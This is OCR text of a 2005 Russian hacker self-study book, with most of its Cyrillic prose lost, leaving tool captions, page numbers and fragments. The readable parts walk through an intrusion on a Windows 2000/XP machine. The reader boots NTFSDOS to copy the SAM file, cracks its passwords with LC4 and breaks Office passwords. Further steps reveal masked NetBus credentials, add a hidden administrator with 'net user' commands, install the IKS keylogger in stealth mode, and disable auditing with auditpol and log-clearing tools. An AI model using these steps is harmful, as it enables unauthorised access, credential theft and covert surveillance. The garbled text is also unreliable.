Самоучитель хакера подробное иилюстрированное руководство

Alex Atsctoy
004.056.53(075.8)
32.973.202-0878-1+32.973.2-018.278-1
Alex Atsctoy.
: . . .: [, ] /
Alex Atsctoy. .: , 2005. 192 .: .
ISBN 5-93673-036-0.
CIP
? ,
, - .
: www.3st.ru
E-mail: post@triumph.ru
ISBN 5-93673-036-0
, 2005
, 2005
, 2005

1.
2. Windows ZOOO/Xf.
25
. "
37
4.
57
5. fyayêpofc Web
73
6.
83
7. XaKUHflCQ
99
8. Web~caumo&
115
9. AmaKU'PoS
143
.
Windows 2000/Xf
160
11.
176
191

1. .............................................................................................. 8
............................................... . .................................................. 9
- ? ................................................................................................... 10
............................................................................................... 13
................................................................................................ 16
....................................................................................................... 16
................................................................................. 17
............................................................................. 75
Web ........................................................................................................... 19
Web ............................................................................................................ 20
................................................................................................................ 21
............................................................................................. 21
................................................................ 22
- ....................................................................................................... 22
................................................................................................................. 23
................................................................................................................. 23
2. 231 WmdOMS 2OOO/XP. .............................................. 25

........................................................................................................ 25
............................................................................................................... 26
........................................................................................................................... 27
Windows 2000/XP ................................................................... 28
SAM .............................................................................................................................. 29
............................................................................................... 30
.............................................................................................................. 31
Windows 2000 ................................................................................ 33
................................................................................................................. 35
................................................................................................................. 36
.&.................................................?
................................................................................. 38
NTFSDOS Pro ...................................................................................................... 39
SAM .................................................................................................................. 44
.................................................................................... 47
******** ............................................................................................. 50
......................................................................................... 51
............................................................................................. 52
......................................................................................................... 53
....................................................................................................... 53
................................................................................................
.. 56
4.
57
58
59
63
66
68
69
70
72
5. & Web
HTML
Web-

73
74
78
81
82
6.
83
83
85
88
89
90
91
96
97
7. ICQ
99

ICQ
IP- ICQ-
ICQ-
ICQ
ICQ-

100
101
102
103
104
106
111
112
113
8. We|?~C3UmO&
115
Web-
Web-
Web-

IIS 5

Web- Teleport Pro

HTML
Web
115
116
118
119
120
122
123
125
131
132
136
138
139
142
9. Ahl3KU "
143
DoS

!8
Smurf.

Nuke
Teardrop
Ping of Death
Land

DoS
144
145
145
147
148
149
151
752
154
154
755
155
756
159
10. Windows 2/.
TCP/IP

.

6
160
162
762
165
765

NetBus

168
169
173
175
176

PhoneSweep 4.4
PhoneSweep 4.4

PhoneSweep

177
178
179
180
782
185
186
186
190
1.
, - ,
, , , . , , . ,
( ).
!!!
, , .. , , 2 () .
.
,
:
log:
:
1:
2:
em: e-mail
.
,
! . 13.06.1999, ..
.
!!!
,
http://www.super-internet-provider.ru
, .
, - , , , , , , , . , , ,

Web- .

-
, . - , . ,
, , , ,
.
- ,
, .
- , , , . ,
, !
, , ,
.
, , .
- , 80- , , , , - ,
.
.

, , , ,
. , , , . ( !),
.
-
(-, !)
,
, .
, ,
-

,
.
, , ,
, ,
, . , ,
,
, ,
, -
.
,

.
, . , , , , , ,

, .
, , ,
. , - ,
, ,
, .
20-
- .
?
, , , , ,
, - , -
, ,
(, -
)
, -
10

. , - , .
, , .
( ).
, :
(, . ).
, ,
, .
Hard DISK [ Fdisk.exe] n- ( , ) .
! , ,
!
[ 24% ]
, POWER - !
IDE- .
, . , , , - , , , - , HARD DISK
- , - , - , .
, Must die,
.
Windows,
, .
,
, .
, Windows ? ,
, - ? , , , ,
.
11

, ?
21 ( ).
:
:

, , ,
, ,
. , .
:

, .

. , , ,
.
:
. .
, . .
, ,
.
.
: ,
.
, ? -
, , ?
,
?
, - .
, , , , , ...
. , ,
, (, ,
) . , :
12

- , 16 19 .
( 80%) , nerd.
: 1) , ; 2)
. (, ?
- ).
Windows Unix,
TCP/IP
, , C++, Perl, Basic.
, . - , - 19- . ,
,
, , .
,
, , .
, , -, , .
, , , . - , , , . ,
. , ,
- , - .
.
, , , . , .
, , .

, ,
.. , .
, , . , -
13

,
, , .
, ,
,
,
. , , : - .
,
. ,
, , , , ,
[3].
, , , . ,
.
"
, , , , .
- - , .
- , , , . ,
, ,
.
14

, ,
, ,
. , . , - , . , , ,
.
,
, (.. ,
). ,
, ,
, , , .
, ,
, , ( rootkit -
). - UNIX,
Windows 2000 , 4,
, , , , Windows, , .
. IP-,

. -
. , - ,
, -,
- ,
.
, 4 -

, ,
.
15

- ,
- . -
, ,
. ,
DoS ,
IDS.

. , .

, - , , .
, ,
.
,
.
; , .
- ,
, , , , .
, , , . , [3] , . ,
, [3] !
[1]. , (
). ,
16

, , - . , , ,
, ,
. ,
. , - , ,
.
, . , ,
,
. - .

. Web- (, RIPE NCC http://www.ripe.net). Web-, Whols,
, ,
.
, , , Web-. Yahoo
(http://www.yahoo.com), Rambler (http://www.rambler.ru).
. , , , , . , , , [3].
Google
(http://www.google.com), . , , C:\WINNT, W i n dows NT/2000. - ,
.
17

, , Teleport Pro.
, Web-
, .
, , HTML Web-
- ,
, HTTP .
, , , , ,
, , , ( 1 1 ).
, Web- - ,
, . , .

, ,
,
. .
-, , , , ..
, , . - SAM
(Security Account Manager - ), .
SAM - ,
3 ,
, LOphtCrack LC4 (http://www.atstake.com).
-, , , , Windows , MS Office . , .
,
3 . Office Password 3.5
(http://lastbit.com/download.asp) Windows - , , .
Revelation SnadBoy
(http://www.snadboy.com). , 18

***** - ,
, -
Revelation .
,
, , , ,
, .
.
-
?
, ,
- , - .
Welo
- . , Web-,
,

-.
, Web, Web-,
Web- ,
. Web- 5 .

,
. , Web-,

.
. , , 6 Death & Destruction Email Bomber -
. , . , , , 6
Brutus.
19

, , ICQ.
- IP- ICQ-
( flood - )
ICQ- , ! - , 7 ICQ Flooder, ICQ-MultiVar, .
- , IP- ICQ- ICQ,
, .
, .
Web
Web- , , , DoS, - .
, IIS 5 (Internet Information Server - ) Microsoft
.
Web- , Web-, HTML . 8 , , CGIScan
Brutus, IIS
. 9 ,
DoS.
Web- ,
,
Web-. , DoS
, - , .
Web , , CGI-. ,

, .
20

TCP/IP , ,
, , IP-,
, .
,
.
10 - SuperScan, foundstone_tools
(http://www.foundstone.com).
W2RK (Windows 2000 Resource Kit -
Windows 2000), ,
W2HK (Windows 2000 Hacker Tools - Windows 2000).
,
, , .
flepex&am

, , . , ,
-
, .
, . ,
, .
- . , ,
, ,
.
- SpyNet, .
21

, , VPN (Virtual Private
Network - ) , , -
. , , , ,
, .

, W2RK (
Windows 2000) W2HK - Windows 2000,
. Windows (Explorer) Windows, . ,
, , password, .
[3], ,
,
, .

, , ,
password.txt , ISP.
, , . , NTFS Windows 2000/XP,
, ,
PGP Desktop Security.
11~
- ,
, .. . Web- ,
(., ,
http://www.securitylab.ru). 8 IIS. CGIScan
, . , 22

- , , IIS 4. Web
, .
- , , . .
, ; , , - ( ). , , - -,
, - .

- , .
- ,
. 10
NetBUS, . , .
- ,
, , .
. - , ,
. , , -
- , ,
... , , .
-
, , , ,
. ,
,
( ), ,
? , , -
23

,
, ?
, - ?
, , ( ),
, , , -
.
,
.

. ,
, ,
, .
, ,
.
, ,
,
, .... , , - Windows 2000/XP.
24
2.
Windows /Xf
Windows 2000 TCSEC (Trusted Computer System Evaluation
Criteria - ) .
,
Windows 2000, , .
.
.
.
, - ,
, ,
, , .. ,
- .

, ( log in - ), - , . ,
, ,
, .
Windows NT/2000/XP SAM (Security
Account Manager - ). SAM
, , . SAM - , 3 .
, .
,
, , .
, -

, , . , , ,
.., , , ,
. , ,
-, (,
, ) ,
, , .
, , , , .
Windows NT 4 NTLM
(NT LAN Manager - NT). NTLM
Windows 2000/XP. NTLM, , LM (LAN Manager - ),
, Windows NTLM.
Windows 2000/XP Kerberos, , ,
. - Windows 2000/XP, -
Windows 2000 Kerberos.
- ,
Windows 2000/XP - . , ,
, ,
- .
, , , .
- . Windows , , , . ,
, .
, , ,
, ,
.
26
Windows 2000/XP
, Windows NT/2000/XP
.
, . ,
, . , ,
. ,
(Guest),
, - (User),
.
, , ,
. , (Administrators), ,
-
, , ...
urn
,
, .
, , - , .. ,
. ,
, . ,
,
, , ,
.
Windows NT/2000/XP,
, , - .
, 4, ,
, .
,
, , , ,
27

, , .
,
11 , , .
, , [2], [6],
, -
Windows 2000/XP, ,
.
Windows 2OOO/XP
Windows 2000/XP SRM
(Security Reference Monitor - ). SRM Windows 2000/XP, .. .
Windows 2000/XP , , SRM. .
LSA (Local Security Authority - ), ,
, LSA.
, LSA . , LSA , .
SAM (Security Account Manager - ), . , LSA.
AD (Active Directory - ),
AD .
,
LSA.
,
, :
, ,
Kerberos; , .
, , , :
, ,
28
Windows 2000/XP
, /, .
SAM AD ,
LSA . , , , ..
, SRM.
, ,
Windows 2000/XP. ,
. -,
(SAM AD); -, . ,
.
SAM
, , , ,
. , , , SAM AD,
. SAM %%\5132\\5,
AD - %KopHeBoft_KaTanor%\ntds\ntds.dit. , , ,
- ! .
,
, , ,
, Windows 2000/XP. SAM
Windows NT 4 , NTLM , ,
,
LM,
Windows. LM , SAM , , LOphtCrack
(http://www.atstacke.com) ,
.
LOphtCrack SAM, , , pwdump
(http://www.atstacke.com). Windows - pwdump SAM
, LOphtCrack,
- ,
LM - .
29

Service Pack 3 Windows NT 4, , Syskey
() , SAM.
Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey
,
. ,
- ,
3-4 , . ,
1 Microsoft, - Microsoft!
Windows. ,
, .

Windows 2000/XP
, , , , ,
? .
, , Windows,
SID (Security
IDentifier), 48- ,
. Windows 2000/XP SID, Windows 2000 SID.
. ,
, ? (, ..)
Windows ACL (Access Control List -
), (Access Control Entries -
). SID
. ACL

30
Windows 2000/XP
, , (Explorer) Windows,
Windows 2000/XP.
ACL.
Windows 2000/XP (, ) LSA , SID 8 , .
, ,
SRM 8 ACL , , .
, , - . ,
, - , . , .
- ACL , Windows 2000/XP . , (, http://www.rootkit.com). ,
ACL !
, - , ? , . ,
, Windows 2000/XP.

Windows NT 4 , ..
, Windows 2000/XP
ADS
(Active Directory Services). ADS Windows 2000,
Windows 2000 Server. , ,
.
- , , ,
, - ADS , , .. . , ,
IP- .
31

ADS , , - ,
.
OU (Organization Units), ,
, , , , ,
, OU. OU - , .. OU , OU .
Windows 2000/XP
, . , .
Windows 2000 , - ,
Windows 2000 Windows NT. , , .
Windows 2000/XP
, . ,
,
. , .. .
, . , domen.
: com*!.domen, comp2.domen...
, ,
, , domenl, domen2,... , ,
.
, domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ... compN.domen2.domen1.
domenl domen2 , forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2
compl.domen2.forest, comp2.domen2.forest, ....
.
32
Windows 2000/XP
, - ,
:
.
(Universal group), , , .
(Global Group),
, ,
.
(Local group domain),
, .
ACL
. -
.
, , AD,
, , .
- AD SAM,
, SAM.
AD , AD, ,
( 10 ), AD , , , . , . ,
, ,
Window 2000, . , , LC4
LOpghtCrack .
, , - - .
Windows 2000
Windows 2000
, . - ,
33
2 - 5830

, -, ,
. -, , , [7], , . -
, ,
- ,
. .
- ,
- , AD. - - ,
- -.
- ,
.

. -,
- . -,
, - ,
, , , .
, , , . . - , , ,
LM, - LM
( , , [3]). Microsoft NTLM ( Service
Pack 3 Windows NT 4) NTLMv2 ( Service Pack 4 Windows NT 4).
, , Windows 2000 Kerberos,
- ,
.
.
, Windows 2000/XP Windows , LM. Windows 2000/XP Kerberos, NTLM LM.
34
Windows 2000/XP
-
TCP- 88 , Kerberos,
. -
LM NTLM, LOphtCrack
.
, - ,

. , ?
, , ,
.
, ,
.
,
. , , ,
.

,
. , , Windows 2000.
,
Microsoft , ,
. Windows XP

Windows.

Windows 2000/XP [7], . , ,
,
.
, , Retina, [7].
35

-, . -, , , VPN (Virtual Private
Network - ). VPN ,
. VPN
, .
, , , ,
(Bruce Schneier),
(Applied Cryptography), - .
, - ,
, .
- , ..
.

Windows 2000/XP , .
SAM, LSA, SRM, ADS, LM, NTLM, Kerberos
.
Windows,
.
Windows 2000/XP, / ADS ,
Microsoft Press Windows 2000.
36
&
Window 2000/XP, ,
, , , ? , 2,
,
,
, . . ( ,
- . .)
- ,
. , , ,
( - ...).
, , . , , , ,
, ,
( - ).
? , -
, . - .
, . ,
-
, - . , .
-, , - - , Windows. , ,
,
,
.
, , ,

(. 1), -
, . -
, , , - -.
-, , , Windows BIOS . , Windows 2000/XP .

,
- (, ). , , - MS-DOS !
- ,
. -, BIOS , BIOS
. .
-, BIOS ,
NTFS, Windows 2000/XP. , MS-DOS - -
, - .
, -, , ( - - ,
! , . , , ),

Windows 2000/XP. -
NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS
MS-DOS. ,
, Windows 2000/XP
.
- , . NTFSDOS
Professional - .
38
1515 fro
NTFSDOS Pro . Windows NTFSDOS Professional
NTFSDOS Professional Boot Disk Wizard (
NTFSDOS Professional). ,
NTFS. .
, FORMAT/S SYS
MS-DOS.
Windows XP Create an
MS-DOS startup disk ( MS-DOS).
> * NTFSDOS Professional
(Start Programs NTFSDOS Professional). (. 3.1).
wizard will help you install V/indows NT/200DvXP system files needed
NTFSDOS Professional to run from a MS-DOS diskette or hard disk
PMC. 3.1. NTFSDOS Pro

> Next (). (. 3.2),
, .
> , Next (),
.
NTFSDOS Pro MS DOS
( 437).
(. 3.3) .
39
NTFSDOS Professional Boot Disk Wizard copies drivers and system files from an existing Windows
NT/20QP/xP installation or CD-ROM to your hard disk or a pair of floppy diskettes.
If you wish to create bootable diskettes you must add MS-DOS to the diskettes yourself, either before or
after using this program. Use the FORMAT/S or SYS commands from a MS-DOS shell to make
bootable diskettes.
You can also make a bootable diskette on Windows XP by opening My Computer, selecting the
"Format" option from the context menu of your diskette drive, and formatting a diskette with the "Create
an MS-DOS startup disk" option checked.
< Back
Next >
Cancel
. .2.

NTFSDOS Pro uses the character set tor Hie United States version of MS-DOS (aide page 437) by default
Select any additional character sets you use with DOS.
Japan, code page 932
Korean (Johab). code page 1361
Korean, code page 949
MS-DOS Canadian-French, code page 863
MS-DOS Icelandic, code page 661
MS-DOS Multilingual (Latin 1). code page 650
MS-DOS Nordic, code page 865
MS-DOS Portuguese, code page 86
MS-DOS Slavic (Latin II). code page 852
< Back
Next >
Cancel
. ..
> Next ().
NTFSDOS Pro
(. 3.4).
Windows
NT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386
Windows NT/2000/XP, - Service Pack.
> Next ().
NTFSDOS Pro (. 3.5).
40
Pro uses copies of several files located in your Windows NT/200Q/XP

m directory.
Specify the name of your Windows NT/2Q.OOVXP installation directory, or a directory containing the required
Windows NT/2000 system files.
|c\ASFRool
<Bock
Cancel
. .4. Windows
target location is the directory from which you will run NTFSDOS Pro. It must be
ssiole from MS-DOS.
Specify the disk or directory from which you would like to run NTFSDOS professional. You may
select A: to specify a floppy disk.
<Back
. .5. NTFSDOS Pro

NTFSDOS Pro. MS-DOS,
.. FAT FAT32. :
. Advanced () NTFSDOS Pro , MS-DOS.
> Next ().
NTFSDOS Pro (. 3.6).
41
floppy labelled NTFSDOS Professional 0
Press Next to copy files ID A:V
<Bsck
Cancel
. .6. NTFSDOS Pro

> Next (),
(. 3.7).
Copying files to diskette...
Cancel
Puc. 3.7.

(. 3.7) Next
() . Windows XP NTFSPRO.EXE
, NTFS .
Windows NT/2000 . NTFSCHK.EXE,
NTFS.
42

(. 3.8)
NTFSDOS Professional.
necessary files hove been copied. You may now reboot to MS-DOS
begin using NTFSDOS Professional Edition.
. .8. NTFSDOS Pro

> Finish (),
.
NTFSDOS Pro,
. NTFSDOS
Pro . ,
, NTFSPRO.EXE, NTFS . ,
, MS-DOS ,
FAT FAT32,
NTFSDOS Pro .
MS-DOS NTFS,
Windows 2000/XP . ,
( - ), , , . , -
, , , . ,
,
, .

- SAM,
, , _/132/1'|.
43
5
SAM, SAM.
NTFSDOS Pro, MS-DOS SAM /KOpeHb_CMCTeMbi/system32/config .
- , , LC4 - LOphtCrack
(http://www.atstake.com).
. 3.9 LC4 Import ().
IB?!
Import | Senion
Help
Import From Local Machine

Import From Remote Registiy..
Import From SAM File...
Import From Sniffer...
Import From .LC File...
Import From .LCS (LC3) File
Import Frum PWDUMP File...
I <o InILM ra:
Use the Import menu to retrieve accounts to audit.
. .9. LC4
, LC4
, . SAM :
> File * New Session ( * ). , . 3.9.
> Import Import From SAM File ( *
SAM). SAM.
> SAM, 1-3.
> (. 3.10) Session Begin Audit
( ) .
44

?l@stakeLC4 -(Unlilbdll
File
View
Import
Sestion
Help
.i u
_u
lALEX-3
IALEX-
(ALEX-
lALEX-3
lALEX-3
lALEX-3
[ALEX-3
Administrator
empty '
ASPNET
Guett
HelpAssittant
IUSH_ALEX-3
empty '
empty '
empty '
IWAM_ALEX-3
NewUzer
amply
" empty '
* \ ft \
' empty '
e.;
Od Oh Qm us
i as
CS
mporled 7 accounts
Puc. 3.10. SAM

, , SAM, . , . 3.11, SAM.
Adnuniitialoi
ASPNET
Guel
HelpAti.tlonl
IUSH.ALEX-3
IWAM.ALEX-3
NenUter
. 3.11. SAM !
, - 007 , , .
, , 5
Pentium 2 400 . 45

- , LC4
.
LC4 Auditing
Options For This Session ( ), . 3.12.
Dictionary Crack D
Enabled
Dictionary List [
The Dictionary Deck tests For passwords that are the same as the words listed in the
word file. This test is very fast and finds the weakest passwords.
Dictionary/Brute Hybrid Crack
El Enabled
|0
Characters to prepend
I Characters to append
Common letter substitutions (much slower)

The Dictionary/Brute Hybrid Crack tests for passwords that are variations of the words in
the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and
finds weak passwords.
Brute Force CrackCharacter Set
El Enabled
D
|A-ZandO-9
Distributed
Ptrtli.
Custom Claraclw Set ch ch*:ttrt
I Oil
The Brute Force Crack tests fa passwords that are made up of the characters specified
in the Character Set. It finds passwords such as "WeR3pll6s" a "vC569t12b". This
lest is slow and finds medium to strong passwords. Specify a character set with more
characters to crack stronger passwords.
OK
Cancel
Puc. 3.12.
, LC4 :
Dictionary Crack ( ), Dictionary
List ( ), . LC4
, ,
. ,
, , , ,
.., .
Dictionary/Brute Hybrid Crack (/ ),
, / ,
, .
Password???, .
46

Brute Force Crack ( ), .
,
. Character Set ( ) ,
Custom (), Custom
Character Set (List each character) ( ( )) .
Distributed ()
. File Save
Distributed ( )
.
LC4
Windows NT/2000/XP.
Windows,
Windows 95/98, Pwltool.
'
Windows , , . MS Office
(http://www.elcomsoft.com), - OfficePassword 3.5.
, , *******

Revelation SnadBoy (http://www.snadboy.com).

, ,
AZPR , Passware Kit,
http://www.lostpassword.com.
Windows - , /, , , Window - OfficePassword
.
47
OfficePassword 3.5
OfficePassword 3.5
Lotus Organizer,
MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicken, MS Office - Excel, Word, Access, Outlook, ZIP
VBA, MS Office.
OfficePassword 3.5

.
Word
password.doc, -
?
, Windows,
password.doc, (. 3.13).
- ,
OfficePassword 3.5
:
> OfficePassword (Start
Programs * OfficePassword). OfficePassword (. . 3.14).
Password
Enter password to open file

: \test\password . doc
II
[ OK
Cancel
Puc. 3.13.
Word
I OfficePassword "DEMO"
File
Took
Option*
1-]
Help
Selecl document
You can also diag-and-drop files from Internet Explorer onto this
window.
> (c) 1998-2001 Vitas Ramanchauskas. LastBit Software <
http://lastbit.com
""" DEMO Version "
| Register to upgrade to a full-functional veision! |
Puc. 3.14.
OfficePassword
> Select document ( )

Windows MS Office.
, Word . ,
MS Word . ,
- OfficePassword 3- .
48

- , .
> , Select recovery
mode ( ), . 3.15.
Select lecoverv mode
Jocument path: C:\test\passwotddoc (Word)
Version
: Wotd 8.0+
ntemal version: 133
Word language : Russian (0419)
incryption type: Strong
Text size
: 537
Preview
Automatic
OflicePassword automatically selects most suitable recovery options. Recovery may take a
lot of time (up to several months in case ol a long password]. About 80% of all passwords
could be recovered within 48 hours. Use guaranteed recovery otherwise.
User-defined
Adjust settings to optimize search for specific case. (This option is for advanced useis only.)
Guaranteed recovery
Success is guaranteed! Important: please read the documentation. Additional fee may apply.
I Click here to learn
Cancel
| Display help info
Next
Puc. 3.15,
> Select recovery mode ( )
:
Automatic ( ), ,
Next (), ,
.
User-defined ( ),
. .
Guaranteed recovery ( ), , , ,
.
> Next
lOlficePasswoid 'DEMO*
Password found:
'007' (without quotes)
The password has been copied onto the clipboard
Would you like to open the document now?
Yes
No
Puc. 3.16. !
49

(). , ,
(. 3.16).
OfficePassword 3.5 , ,
. - , .
, - ,
.
, , 24-28
, . ,
, .
, , - ,
.
******
, - ,
, (, ), , ******.
, , , . - , , ,
. ,
.
,
-,
. ,
,
NetBus . . 3.17
Revelation Snad (http://www.snadboy.com) NetBus
NetBus.
50
* SnadBoy's Revelation
'Circled V Cursor
Drag to reveal password
| Check For Update) |
About
Exit
I Copy to clipboard
Text ol Window Under 'Circled V Cursor (il available)
007
Status
Revelation active.
Length of available text: 3
Reposition Revelation out of the way when dragging 'circled V

When minimized, put in System Tray
i SWORD-2000
iMycq
Change Hoct
"Host informationDestination: |SWORD-200

Host name/IP: 1.0-0-1
TCP-port:
Always on top
Hide 'How to' instructions
How to
1) Left click and drag (while holding down the left mouse button) the 'circled V
2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field
under the cursor will be displayed in the Text of Window...' box.
3) Release the left mouse button when you have revealed the text you desire.
NOTE - II the field contains text hidden by asterisks (or some other character), the actual text will be
shown. In some cases the text may actually be asterisks.
NOTE - Not an of the fields that the cursor passes over will have text that can be revealed. Check
the status light foi availability of text.
Bright green - text available (See length of text:' in Status area)
Blight red - no text available
User name: |Administrator

Password:
Cancel
Puc. 3.17. NetBus Sword-2000

!
Revelation .
'Circled+'Cursor ('+')
SnadBoy's Revelation ( . 3.17 Password ()). Revelation,
Test of Window Under Circles and Cursor (if available) (
( )) (
). . 3.17, 007 NetBus Sword-2000,
( ).

( NetBus) [11].

- , - , -
, , - .
: .
51

, 4.
-
, ,
, . , , ,
. - ,
backdoor - , ,
.
&*
, , , , .
MS-DOS: NET USER < > <> /ADD,
, NET
LOCALGROUP < > < > /ADD, . . 3.18 .
r^JCommand Prompt
- NewUser 00 /add
|The command completed successfully.
C:\>net localgroup fldministrators NewUspr /add
I The command completed successfully.
Puc. 3.18.
NewUser
NewUser
, , .
,
,
.
52

- , . Windows - Startup
Document and Settings ( ) , .
Startup, All users, .
,
, . , (), .
IKS (Invisible KeyLogger
Stealth - ), - http://www.amecisco.com.

- ,
. - , , .
IKS -
http://www.amecisco.com, Invisible
KeyLogger 97 8 10 , .
Windows NT/2000/XP, , , 1^' l+ir^n+l0"8"]. IKS
Windows NT/2000/XP. , IKS , .
IKS .
Web- iks2k20d.exe , . 3.19.
53

D Standard Install | p Stealth Install | D Uninslall |
It's recommended that you use Standard Install if this is your first time in using IKS. Just
accept the defaults and dick on "Install Now" button. Or you can dick on 'Read readme M"
to get familiar with the concept of IKS first.
During a standard installation a program directory will be created; program files will be
placed in the directory. An icon to the log file viewer will be placed on the desktop. No Tile
renaming (stealth features) will take place.
Install Directory
|C \Progrem Files\iks
You need to heva administrator rights on this system for it to install successfully.
rf you want to uninstall in the future, just run this program (iksinstall.exe) again, dick on the
"Unmstall" tab, then "Uninstall Now" to automatically uninstall the standard installation.
Read readme.M
. 3.19. IKS
Install Now ( ) -
. IKS . ,
IKS , iks.sys,
. ,
dataview.exe, . 3.20.
Settings Help
0 Filter Out Arrow Keys

D Filter Out Ctrl and Alt Keys
Rtter Out F1 to FT 2 Keys
Filter Out All Other Function Keys
Use Notepad
Translate to Text Only
Gear La a
Clear Binary Log Upon Exit
0 dear Text Log Upon Exit
Import Binary Log From:
Save Text Log To:

C:\DOCUME~1\ADMINI~1.000\LOCALS
I Browse,
Puc. 3.20.

54

Go! () , . . 3.20 ,
, .
, IKS , . iks.sys KOpeHb_CHCTeMbi/system32/drivers,
( Regedt32 . 3.21).
Registry Editor [HKEY LOCAL MACHINE on Locnl Mnchi
Registry Edit Tree View Security Options Window
SGemuwa
SGpc
&I37DRIVER
CEJIAS
ICQ Groupware
COIISADMIN
IPMksl
CD ILDAP
QIMAP4D32
GDIMonitor
inetaccs
Cllnetln(o
Help
Start: REG_DWORD: 0x3

Type: REG_DWORD: 0x1
Inport
Puc. 3.21. Windows

(,
The Cleaner, ).
IKS, Stealth Install
( ) (. 3.19)
- , calc.sys,
(, -
- ).
IKS
. 007 Stealth
Monitor, Web-, , ,
. -
Windows,
- , , notepad.exe.
55

, BIOS,
. , . , ,
. , - , , , , ( ), , ,
.
- ,
,
.
Windows 2000/XP
. Windows 9x/Me, -
, PGP
Desktop Security, .
Windows 9x/Me ,
.
, , , , - ?
. .
56
4.

- , ,
,
. , , , , , - , , ,
. , ,
- , , , .
, -
. 1 , 50%
,
- , , .

, ,
,
. , ,- , , . ,
( ).

, - ( ).
,

. , - , , , .
.

, , ,
. , , , -
. , privacy - . ,
, , , ,
, ,
.
, [10],
(, ) , - , - privacy. ,
, , ,
, , - ,
. .
, , ,
,
, . , . .
-, . ,
, .
, ,
, - ,
.
-, .

. , Web-
, Web, .
, , ,
58

(, ).

, , - , , - . ,
? , , . :
, .
, Web-.
, -
.
,
.
Windows,
(Explorer) , .
,
Windows.
,
MS Office.
, , ,
.
? , .

. ,
, (Explorer) , . ,
(Delete) Windows , , .
Windows , , , , , MS Office.
, , (Show hidden files and folders)
59

(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).
)0 j
| | j
.
| | |
:
" "
;
D
0
0 ()
Q

Q -

, / "
<1
|
OK
1 I
. 4.1.
- Word
(Delete) Windows ,
. . 4.2,
, Word,
, ,
.

^
1 ^3
I-QPGP
g Security
I ; Database
L
SJ
I
rf 3.5 (:)
& (:)
(D:)
: 10 ( 50
3PGP
I] Security
5|
50~$ .doc
|~WRL0002.tmp
_~WRU>004.tmp
|~WRL1120.tmp
~WRL19B2.tmp
|~WRL3531.tmp
||
Puc. 4.2. ,

, - ., .WBK, 60

, ~$. ,
, , Windows, ,
,
Windows. , - , , . ?
, MS Office, ,
, , Norton Utilities.
- Cleaner Disk Security
(http://www.theabsolute.net/sware/index.htmlttClndisk).

,
, , . , . ,
, . - , , .
( 100%) .
. 4.3 Clean Disk Security 5.01
(http://www.the-absolute.net/sware/
index.html#Clndisk), ,

( ).
Clean Disk Security 5.01

Erase
fully ( ).

, , - . 4.3. Clean Disk Security 5.01

(
61

FAT NTFS). , , .
Windows, Windows,
Temp ( , , )
. -,
, ,
(cookie).
, (. 4.3).
. 4.3, :
Simple () - 6 ,
. ; 1 .
NIS - 7 (.. ) .
Gutmann - 35
(.. ).
(Peter Gutmann) . . ,
( ).
Test mode ( ) - #10
ASCII.
. , Clean Disk Security 5.01

, , .
, [10]. -
, : (UPS);
. , ,
.
,
.
62

, , .
, ,
. -, ,
, .
, . , , , Norton Utilities, , / , .
, , [10].
( ) - , ,
regedt32.

. , ,
NTFS.

, ,
, -
. , - - Web- .
, , .
.
, ,
.
&
, , .
. ,
.
63

, . ().
, ,
, .
( Web-,
, , ),
, , ,
. , , .
(., [5],
[10], -
, , ). , -,
. , , , .
, -.
-, , .
. , . , , ,
. -,
- ,
!
- , ,
, .
, , !!!
Web- ,
64

. HTML- Web-.
Web- , , Web-,
.
,
, Web-
http://www.privacy.net/analyze, , Web- .
. 4.4, , Web-, - .
3l Analyze Your Internet Privacy - Microsoft Internet Explorer
^^^^"
^^^^~
BBSBBBgg
**- ^
Your Browser Type and Operating System:

Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler)
All Information sent by your web browser when requesting this web page:
Accept: */* Accept-Language: ru Connection; keep-alive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:
Date=1/30/2002; Privacy. net=Privacy+Analysis Via: 1.1 cea15. 1.1
proxy.iptelecom.net.ua:3128 (Squid/2.4.STABLE3) X-Forwarded-For: 212.9.232.151,
212.9.224.89 Cache-Control: max-age=259200
a_
. 4.4. Web-
, ( )
Whols,
1,
.
, - , IP- . Web-
Web- , IP- -
...
65
3 - 5830
, , Web-, ( anonymizer -
). , Web-,
,
. , ,
http://www.anonymizer.com. (. 4.5).
Anonymizer.com -- Onlinu Privacy Sorvic
4- - - 1 | U [ ife-r ^ "
hup.//wwwanonymteBf.coin.
Anonymizer.com
(| AboutPrivacy'
FIND IT STO
spyCap
" '"
. 4.5. Web-
Go.

- ,
- FTP-, , , . , , ,
Web-, ,
.
( ), .
Web -, - (Proxy server)

(. 4.6).
66
'"

.
,
D
Q
0 -
:
|www.anonymize| ; J8080
[...!
D -
-
:
:
:
1
1
1
. 4.6. -
- , , , .. Web-
-,
.
- .
- HTTP, FTP-,
Web-,
FTP.
- , .
- .
- . , ,
, Web-, , Yahoo.
proxy+server+configuration+Explorer,
Web-, ,
-.
- ,
, .
67

, , , ,
, , , .
, , , 3 IKS. , , NetBus
(http://www.netBus.org).
, , ,
, , .
:
- , (
- ).
IP- , -,
.
, , . , Back Orifice 2000
31337 , , 31336, , , .
,
Windows NT/2000/XP.
, auditpol
W2RK, - , , elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
(Event Viewer) Windows 2000/XP.
, ,
(Hidden).

Windows, .
, .
,
68

, , explorer.exe,
Windows
Windows.

, EliteWrap, [11].

( Rootkit - ). ,
, .

.
Tripwire (http://www.tripwiresecurity.com),
, Cisco
Systems (http://www.cisco.com)
. Windows 2000/XP , ,
, [7].

, ,
, -
, .
, / .

Windows NT/2000/XP, , auditpol.exe
W2RK. ( )
, . :
C:\Auditpol>auditpol \\ComputerName /disable

Running...
Audit information changed successfully on \\ComputerName ...
New audit policy on \\ComputerName ...
(0) Audit Disabled
69

System
Logon
Object Access
Privilege Use
Process Tracking
Policy Change
Account Management
Directory Service Access
Account Logon
= No
= No
= No
= No
= Success and Failure
= No
= No
= No
= No
//ComputerName - , /disable
